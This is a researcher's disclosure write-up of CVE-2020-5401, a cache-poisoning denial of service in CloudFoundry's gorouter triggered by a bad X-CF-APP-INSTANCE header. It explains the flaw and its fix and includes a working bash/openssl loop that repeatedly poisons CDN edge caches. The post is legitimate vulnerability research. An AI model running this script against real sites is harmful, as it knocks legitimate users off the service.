Cache poisoning DoS in CloudFoundry gorouter (CVE-2020-5401)

February 25, 2020

I first touched on the technique of cache poisoning causing a Denial of Service just over a year ago when I published CORS'ing a Denial of Service via cache poisoning, which details a technique that would allow an attacker to poison the Access-Control-Allow-Origin header value in cached API responses, meaning any genuine CORS request to the resource would be denied. Not long after, this type of vulnerability gained more traction with the different (and more impacting) techniques outlined in the excellent CPDoS.org research.

This time around, I'm detailing a similar issue, but with an even more refined scope than CPDoS via CORS - this issue affected the CloudFoundry platform, a now VMWare owned cloud offering for developing web apps with APIs that abstract the underlying infrastructure (such as AWS or GCP). More specifically, it affected the gorouter package - the component responsible for directing web requests to specific CloudFoundry app instances.

To achieve CPDoS, one must find a way to cause an undesirable response that ends up in a front end cache and served to other users. Typically, a cache won't allow this to happen if the technique used to cause the undesirable response relies on some input provided in a standard or anticipated way, such as in the query string, or in common HTTP headers - such input would be used by the cache to generate the key for the cached copy, and only other requests with the same input would receive the cached response back. However, cloud systems often provide advanced users and sys admins with extra abilities via custom HTTP headers, such as added diagnostic information or control over routing, which is where the CPDoS vulnerability for CloudFoundry could be found - in its custom X-CF-APP-INSTANCE request header.

This header allows the requester to target a specific app and instance with the format of APP-GUID:INSTANCE-NUMBER, such as X-CF-APP-INSTANCE: aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa:1. If the guid is a valid value held by a running app, and the instance number is pointing to a valid running instance, then the request will be served by that instance. However, if you feed in a bad value (like the example just given with all the a's), you would get a response back like:

HTTP/1.1 404 Not Found
Date: Tue, 25 Feb 2020 07:32:28 GMT
Content-Type: text/plain; charset=utf-8
Cache-Control: public, max-age=3600
Vary: Accept-Encoding
X-Cf-Routererror: unknown_route

The problem with this response is we are given back a HTTP 404 error, which is cacheable by default according to the RFC, and in fact will be cached by default when using common web cache frontends like Cloudflare and CloudFront. The Cache-Control: public, max-age=3600 only seems to compound the issue, although my testing on CloudFront seemed to indicate that this was not critical for the 404 error to be cached.

As I originally found this issue on an asset in a public bug bounty program (not yet disclosed), I sought to maximize the impact of the vulnerability and demonstrate how this could allow me to cause widespread DoS with only a handful of requests. This asset was behind CloudFront, which means we can use a resource like https://www.nexcess.net/web-tools/dns-checker/ to first collect the IP addresses of the target's edge caches, and then for each edge cache, run a script like the following:

#!/bin/bash

while true
do
    printf 'GET /?cb=xxx HTTP/1.1\r\n'\
'Host: TARGET_HOST\r\n'\
'X-CF-APP-INSTANCE: xxx:1\r\n'\
'Connection: close\r\n'\
'\r\n'\
    | openssl s_client -ign_eof -connect IP_OF_EDGE_CACHE:443 -servername TARGET_HOST
    sleep 10
done

This will poison the cache for the resource https://TARGET_HOST/?cb=xxx, where the edge cache IP and the target hostname would be placed in the raw HTTP request and openssl command arguments where relevant. This script issues the poisoning every 10 seconds, to ensure the DoS is maintained. Depending on which IPs you target, you can control which CloudFront regions are poisoned. In this example I've used what's called a cache buster - the ?cb=xxx in the query string. Because I confirmed before hand that the query string is used in the cache key, I knew it would be safe to attack this target using the cache buster without affecting real traffic - only those also requesting with the same query string would be affected. Of course, a real attacker won't be this courteous, but this technique is important when testing bounty program assets for issues like CPDoS, as you don't want to affect real users/customers.

In this particular instance, a specific header with a specific type of value created an error response when targeting a specific cloud platform, which was cacheable and likely would have been cached by most conforming web caching layers. The result of this is cache poisoning DoS - the error you raised can and will be served to other users, effectively blocking their access to the target. While it is unlikely this specific header will have a similar effect anywhere outside of CloudFoundry, I wouldn't be surprised if similar CPDoS issues are present in other cloud providers. In this case, the fix could be found in multiple places - you could configure the caching layer to no longer cache 404 errors, or you could make sure the X-CF-APP-INSTANCE header is used in determining the cache key. Or, the cloud provider could instead return a non-cacheable response, which is what Pivotal did in fixing this vulnerability in the gorouter component, opting instead for a HTTP 400 response (which, as the CPDoS.org research outlined, may still be cached, but only if the caching layer is poorly configured).

This issue was allocated CVE-2020-5401 and fixed in a recent release of the CloudFoundry gorouter package.

Update 13/03: The original bounty report regarding this vulnerability has been disclosed.